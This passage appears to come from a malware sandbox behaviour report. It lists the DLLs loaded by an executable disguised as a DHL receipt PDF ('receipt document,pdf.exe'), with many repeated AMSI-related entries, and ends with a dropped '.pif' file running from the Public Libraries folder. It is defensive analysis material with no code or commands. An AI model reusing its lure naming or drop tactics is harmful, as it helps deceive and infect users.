Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: ieproxy.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: ieproxy.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: ieproxy.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: mssip32.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: mssip32.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: mssip32.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: smartscreenps.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: smartscreenps.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: smartscreenps.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: winhttpcom.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: webio.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: ???.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: ???.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: ???.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: ??l.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: ??l.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: ?.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: ?.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: ??l.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: ????.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: ???e???????????.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: ???e???????????.dll
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: ??l.dll
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: am.dll
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: edputil.dll
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: slc.dll
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: sppc.dll
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\Public\Libraries\yfkwifxL.pif Section loaded: apphelp.dll
Source: C:\Users\Public\Libraries\yfkwifxL.pif Section loaded: winmm.dll
Source: C:\Users\Public\Libraries\yfkwifxL.pif Section loaded: kernel.appcore.dll
Source: C:\Users\Public\Libraries\yfkwifxL.pif Section loaded: uxtheme.dll
Source: C:\Users\Public\Libraries\yfkwifxL.pif Section loaded: windows.storage.dll
Source: C:\Users\Public\Libraries\yfkwifxL.pif Section loaded: wldp.dll
Source: C:\Users\Public\Libraries\yfkwifxL.pif Section loaded: propsys.dll
Source: C:\Users\Public\Libraries\yfkwifxL.pif Section loaded: profapi.dll
